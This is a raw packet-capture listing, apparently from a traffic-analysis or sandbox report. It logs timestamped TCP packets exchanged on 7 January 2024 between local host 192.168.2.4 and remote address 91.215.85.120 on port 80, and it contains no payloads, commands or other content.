                                                                                                                                                                    Jan 7, 2024 05:29:37.838772058 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:37.838802099 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:37.851133108 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:37.851186037 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:37.851191044 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:37.902241945 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:37.902317047 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:37.902333975 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:37.902390003 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:37.902456045 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:37.902523994 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:37.966487885 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:37.966573954 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:37.966664076 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:38.022402048 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.022454023 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:38.022483110 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.022612095 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.022675037 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:38.022687912 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.025930882 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.025976896 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:38.026029110 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.026667118 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.026707888 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:38.026746988 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.026793003 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.026832104 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:38.026873112 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.027637959 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.027687073 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:38.027713060 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.029911995 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.029942036 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.029954910 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:38.032495975 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.032536983 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.032542944 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:38.045063019 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.045165062 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.045252085 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:38.102508068 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.102569103 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:38.103033066 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.103115082 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.103200912 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.103250980 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:38.162789106 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.162834883 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:38.162880898 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.219513893 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.219583988 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:38.219608068 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.219733953 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.219846964 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.219870090 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:38.221646070 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.221690893 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:38.221708059 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.222549915 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.222589016 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:38.222876072 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.224117041 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.224164963 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:38.224185944 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.227132082 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.227174997 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:38.227452040 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.227827072 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.227866888 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:38.228050947 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.228167057 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.228208065 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:38.228285074 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.239535093 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.239594936 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.239604950 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:38.294336081 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:38.296911001 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.296946049 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.296987057 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:38.297188044 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.297203064 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.297247887 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:38.357667923 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.357748985 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.357798100 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.357800007 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:38.357924938 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.357964039 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:38.413038969 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.413110018 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.413153887 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:38.413320065 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.413491011 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.413532972 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:38.415164948 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.415258884 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.415309906 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:38.416055918 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.416093111 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.416143894 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:38.417923927 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.417963982 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.418008089 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:38.420749903 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.420933008 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.420984983 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:38.421343088 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.421432018 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.421473980 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:38.421746016 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.421848059 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.421890020 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:38.433113098 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.433181047 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.433240891 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:38.488348007 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.490919113 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.490988970 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.491014004 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:38.491097927 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.491149902 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:38.491236925 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.551441908 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.551456928 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.551515102 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.551563025 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:38.551575899 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.551628113 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:38.607219934 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.607239008 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.607296944 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:38.607777119 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.607866049 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.607907057 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:38.611290932 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.611371040 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.611421108 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:38.611459017 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.611511946 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.611547947 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:38.612929106 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.613007069 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.613050938 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:38.616172075 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.616197109 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.616266012 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:38.616431952 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.616650105 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.616689920 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:38.616775990 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.616835117 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.616873980 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:38.627213001 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.627650023 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.627707958 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:38.685964108 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.686002970 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.686104059 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:38.686196089 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.686209917 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.686345100 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:38.746718884 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.746757984 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.746810913 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:38.746879101 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.746939898 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.746985912 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:38.747030020 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.747102022 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.747148991 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:38.802382946 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.802804947 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.802860022 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:38.804086924 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.804125071 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.804169893 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:38.807019949 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.807111025 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.807152987 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:38.807249069 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.807348967 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.807388067 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:38.808492899 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.808603048 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.808650970 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:38.812715054 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.812740088 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.812782049 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:38.812849045 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.813014030 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.813057899 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:38.823443890 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.823488951 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:38.823724985 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.823769093 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:38.881561995 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.881577969 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.881622076 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:38.881642103 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:38.881670952 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.881714106 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:38.881717920 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.881753922 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:38.941996098 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.942044020 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:38.942087889 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.942126989 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:38.942151070 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.942193031 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:38.942370892 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.942411900 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:38.942451954 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.942487955 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:38.942534924 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.942578077 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:38.998735905 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.998755932 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:38.998814106 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:39.000071049 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:39.000113964 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:39.000118971 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:39.000153065 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:39.003432989 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:39.003483057 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:39.003521919 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:39.003559113 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:39.003741026 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:39.003778934 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:39.003843069 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:39.003879070 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:39.004798889 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:39.004841089 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:39.004872084 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:39.004910946 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:39.009202957 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:39.009248972 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:39.009289980 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:39.009327888 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:39.009955883 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:39.010001898 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:39.010170937 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:39.010212898 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:39.019330978 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:39.019386053 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:39.019853115 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:39.019906998 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:39.077157021 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:39.077244997 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:39.077255011 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:39.077410936 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:39.077555895 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:39.136693954 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:39.136765003 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:39.136820078 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:39.136852026 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:39.137732029 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:39.137823105 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:39.192990065 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:39.194566965 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:39.194626093 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:39.194679022 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:39.197491884 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:39.197530031 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:39.197767019 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:39.199179888 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:39.199413061 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:39.203892946 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:39.203917980 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:39.203957081 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:39.204554081 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:39.204636097 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:39.204674959 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:39.214185953 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:39.214839935 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:39.214883089 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:39.273617983 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:39.273998022 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:39.274090052 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:39.274156094 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:39.333201885 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:39.333432913 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:39.333915949 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:39.334022045 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:39.334060907 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:39.334127903 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:39.334306955 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:39.334350109 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:39.388835907 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:39.388896942 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:39.389065027 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:39.391870022 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:39.391948938 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:39.392014027 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:39.393690109 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:39.393764019 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:39.393821955 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:39.397707939 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:39.397900105 CET804973591.215.85.120192.168.2.4
